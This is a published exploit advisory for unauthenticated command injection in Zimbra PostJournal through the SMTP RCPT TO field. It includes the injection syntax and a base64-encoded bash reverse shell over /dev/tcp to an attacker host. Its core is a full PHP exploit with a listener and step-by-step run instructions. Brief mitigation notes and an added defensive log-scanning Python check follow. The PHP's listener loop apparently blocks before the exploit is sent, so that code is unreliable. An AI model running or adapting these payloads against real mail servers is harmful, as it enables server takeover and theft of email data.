Zimbra Collaboration Suite Postjournal 9.0.0 Remote Command Execution

08 Dec 2025 | Reported by indoushka | Type: packetstorm | Source: packetstorm.news | 133 views

Zimbra PostJournal 9.0.0 allows unauthenticated remote command execution via RCPT TO SMTP injection.

Code
    =============================================================================================================================================
    | # Title     : Zimbra Collaboration Suite Postjournal 9.0.0 Unauthenticated RCE                                                           |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.zimbra.com/                                                                                                     |
    =============================================================================================================================================
    
    POC : 
    
    1. Overview
    -----------
    A critical vulnerability exists in the Zimbra Collaboration Suite (ZCS) PostJournal service that allows attackers to execute arbitrary system commands without authentication. 
    The vulnerability is triggered through SMTP injection using a malicious RCPT TO parameter. This exploit provides full remote command execution (RCE) as the Zimbra user, enabling an attacker to gain a reverse shell.
    
    The root cause is improper sanitization of user-controlled email fields inside the PostJournal processing mechanism.
    
    ----------------------------------------------
    
    2. Vulnerability Details
    ------------------------
    The PostJournal service processes incoming emails and interacts with external components. Due to a command injection flaw in the way Zimbra handles the RCPT TO address, attackers can inject shell commands using syntax such as:
    
        RCPT TO:<aabbb$(COMMAND)@domain.com>
    
    The address reaches a shell unescaped, so the shell expands the `$()` expression as a command substitution and runs it in the mail server's context.
    
    This leads to full RCE.
    
    ----------------------------------------------
    
    3. Requirements
    ---------------
    • ZCS installation (vulnerable version)  
    • SMTP access reachable externally  
    • No authentication required  
    • Attacker’s listener ready to receive reverse shell  
    
    ----------------------------------------------
    
    4. Proof of Concept (PoC)
    -------------------------
    The exploit uses standard SMTP commands:
    
        EHLO localhost
        MAIL FROM:<[email protected]>
        RCPT TO:<aabbb$(payload)@test.com>
        DATA
        Test
        .
        QUIT
    
    The payload is a Base64-encoded reverse shell executed via:
    
        echo BASE64 | base64 -d | bash
    
    ----------------------------------------------
    
    5. PHP Exploit Code
    -------------------------------------------
    The following PHP PoC sends the exploit to Zimbra and creates a built-in TCP listener without using `pcntl_fork()`:
    
    <?php
    set_time_limit(0);
    error_reporting(E_ALL);
    ob_implicit_flush(true);
    
    class SMTPExploit {
        private $target;
        private $port;
        private $lhost;
        private $lport;
        private $mail_from;
        private $rcpt_to;
        private $sock;
        private $command;
    
        public function __construct($target, $port, $lhost, $lport) {
            $this->target = $target;
            $this->port = $port;
            $this->lhost = $lhost;
            $this->lport = $lport;
    
            $this->mail_from = $this->random_email();
            $this->rcpt_to = $this->random_email();
            $this->command = $this->generate_b64_shell();
        }
    
        private function random_email() {
            return substr(md5(rand()), 0, 8)."@test.com";
        }
    
        private function generate_b64_shell() {
            $cmd = "/bin/bash -i 5<> /dev/tcp/{$this->lhost}/{$this->lport} 0<&5 1>&5 2>&5";
            $b64 = base64_encode($cmd);
            return "echo ${b64}|base64 -d|bash";
        }
    
        private function injected_rcpt() {
            return "aabbb\$({$this->command})@{$this->rcpt_to}";
        }
    
        private function connect() {
            $this->sock = fsockopen($this->target, $this->port, $e, $s, 10);
            if (!$this->sock) die("[!] Cannot connect to SMTP server\n");
            fgets($this->sock, 4096);
        }
    
        private function send($cmd) {
            fwrite($this->sock, $cmd."\r\n");
            return fgets($this->sock, 4096);
        }
    
        public function run() {
            echo "[*] Connecting to SMTP...\n";
            $this->connect();
    
            $this->send("EHLO localhost");
            $this->send("MAIL FROM:<{$this->mail_from}>");
    
            $inj = $this->injected_rcpt();
            $this->send("RCPT TO:<{$inj}>");
    
            $this->send("DATA");
            fwrite($this->sock, "Test\r\n.\r\n");
    
            $this->send("QUIT");
            fclose($this->sock);
    
            echo "[+] Exploit Sent.\n";
        }
    }
    
    class Listener {
        private $host;
        private $port;
    
        public function __construct($h, $p) {
            $this->host = $h;
            $this->port = $p;
        }
    
        public function start() {
            echo "[*] Starting listener on {$this->host}:{$this->port}\n";
    
            $sock = stream_socket_server("tcp://{$this->host}:{$this->port}", $e, $s);
            if (!$sock) die("[!] Cannot start listener\n");
    
            while (true) {
                $client = @stream_socket_accept($sock, 1);
                if ($client) {
                    echo "[+] Connection received\n";
                    $this->interactive($client);
                    fclose($client);
                }
            }
        }
    
        private function interactive($client) {
            fwrite($client, "Connected!\n> ");
    
            while (!feof($client)) {
                $cmd = trim(fgets($client));
    
                if ($cmd === "exit") break;
    
                $out = shell_exec($cmd);
                fwrite($client, $out . "\n> ");
            }
        }
    }
    
    $target = $argv[1] ?? "127.0.0.1";
    $port   = $argv[2] ?? 25;
    $lhost  = $argv[3] ?? "0.0.0.0";
    $lport  = $argv[4] ?? 4444;
    
    echo "[*] Launching listener thread...\n";
    
    $listener = new Listener($lhost, $lport);
    
    $listener_running = false;
    $exploit_sent = false;
    
    while (true) {
    
        if (!$listener_running) {
            echo "[*] Listener online...\n";
            $listener_running = true;
            $listener->start();
        }
    
        if (!$exploit_sent) {
            echo "[*] Sending exploit...\n";
            $e = new SMTPExploit($target, $port, $lhost, $lport);
            $e->run();
            $exploit_sent = true;
        }
    
        usleep(10000);
    }
    
    ?>
    
    -------------------------
    How to Run the Exploit
    -------------------------
    
    ### **1. Save the script**
    Save the code as:
    
        zimbra_rce.php
    
    ### **2. Start it from terminal**
    Windows example:
    
        php zimbra_rce.php 192.168.1.50 25 192.168.1.10 4444
    
    Linux example:
    
        php zimbra_rce.php mail.example.com 25 attacker-ip 4444
    
    ### **Arguments format:**
    
    | Argument | Description |
    |---------|-------------|
    | 1       | Target Zimbra SMTP IP |
    | 2       | SMTP port (default 25) |
    | 3       | Attacker listener IP |
    | 4       | Listener port |
    
    ### **3. Wait for Shell**
    If the server is vulnerable, you will see:
    
        [*] Listener online...
        [*] Sending exploit...
        [+] Exploit Sent.
        [+] Connection received
        Connected!
        >
    
    Now you have a remote shell.
    
    ----------------------------------------------
    
    6. Impact
    ---------
    • Full remote command execution  
    • Full server compromise possible  
    • Email data exposure  
    • Privilege escalation (depending on system configuration)  
    • Lateral movement inside the network  
    
    ----------------------------------------------
    
    7. Mitigation
    -------------
    Until patches are applied:
    
    • Block external SMTP access to PostJournal component  
    • Apply strict sanitization rules for RCPT field  
    • Monitor suspicious SMTP activity  
    • Restrict Zimbra service user privileges  
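
    As an added defender-side example (not part of the original advisory and not Zimbra's or Postfix's code), the check below applies the strict RCPT sanitization and SMTP monitoring suggested in this section to the `aabbb$(COMMAND)@domain.com` pattern from section 2: it classifies a recipient address and scans log lines for addresses a POSIX shell would expand. The allowlist, the Postfix-like log layout and the sample lines are assumptions constructed for the example.

```python
import re

# Allowlist for the local part of a recipient address. Deliberately stricter
# than RFC 5322 atext ('$', '&', '|', '!' are legal there): a mail pipeline
# that ever hands an address to a shell cannot afford those characters.
LOCAL_PART_OK = re.compile(r"^[A-Za-z0-9._%+-]{1,64}$")
DOMAIN_OK = re.compile(r"^[A-Za-z0-9.-]{1,253}$")

# Constructs a POSIX shell would expand or split on. $(...) is the form the
# advisory describes; backticks, ${...} and separators are the usual siblings.
SHELL_META = re.compile(r"\$\(|\$\{|`|[;|&<>\n\r]")

# Recipient as it appears in a Postfix-style 'to=<...>' log field (assumed layout).
TO_FIELD = re.compile(r"to=<([^>]*)>")


def classify_rcpt(address: str) -> str:
    """Return 'ok', 'injection' (shell metacharacters present) or 'malformed'."""
    if SHELL_META.search(address):
        return "injection"
    local, sep, domain = address.rpartition("@")
    if not sep or not LOCAL_PART_OK.match(local) or not DOMAIN_OK.match(domain):
        return "malformed"
    return "ok"


def scan_log(lines) -> list:
    """Return (line_no, recipient, verdict) for every recipient that is not 'ok'."""
    findings = []
    for n, line in enumerate(lines, 1):
        for rcpt in TO_FIELD.findall(line):
            verdict = classify_rcpt(rcpt)
            if verdict != "ok":
                findings.append((n, rcpt, verdict))
    return findings


# Constructed sample log lines (not real traffic), Postfix-like layout.
SAMPLE_LOG = [
    "Dec  8 10:02:11 mail postfix/qmgr[1201]: 4F1A2: from=<3f2a9c1e@test.com>, size=312, nrcpt=1 (queue active)",
    "Dec  8 10:02:11 mail postfix/smtpd[1337]: 4F1A2: client=unknown[203.0.113.5], to=<alice@example.com>",
    "Dec  8 10:02:12 mail postfix/smtpd[1337]: 4F1A3: client=unknown[203.0.113.5], to=<aabbb$(id)@example.com>",
    "Dec  8 10:02:13 mail postfix/smtpd[1337]: 4F1A4: client=unknown[203.0.113.5], to=<bob`id`@example.com>",
    'Dec  8 10:02:14 mail postfix/smtpd[1337]: 4F1A5: client=unknown[203.0.113.5], to=<"carol (x)"@example.com>',
]

if __name__ == "__main__":
    for n, rcpt, verdict in scan_log(SAMPLE_LOG):
        print(f"line {n}: {verdict:9s} {rcpt}")
```

A quoted local part is reported as malformed rather than inspected further, because quoting is exactly where metacharacters hide; treat any such hit on an internet-facing SMTP listener as worth a look.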
    
    ----------------------------------------------
    
    8. Conclusion
    -------------
    This vulnerability presents a severe risk and must be mitigated immediately.  
    The exploit demonstrates how a simple SMTP injection can lead to full RCE, highlighting the need for strict input validation in email-processing systems.
    
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================
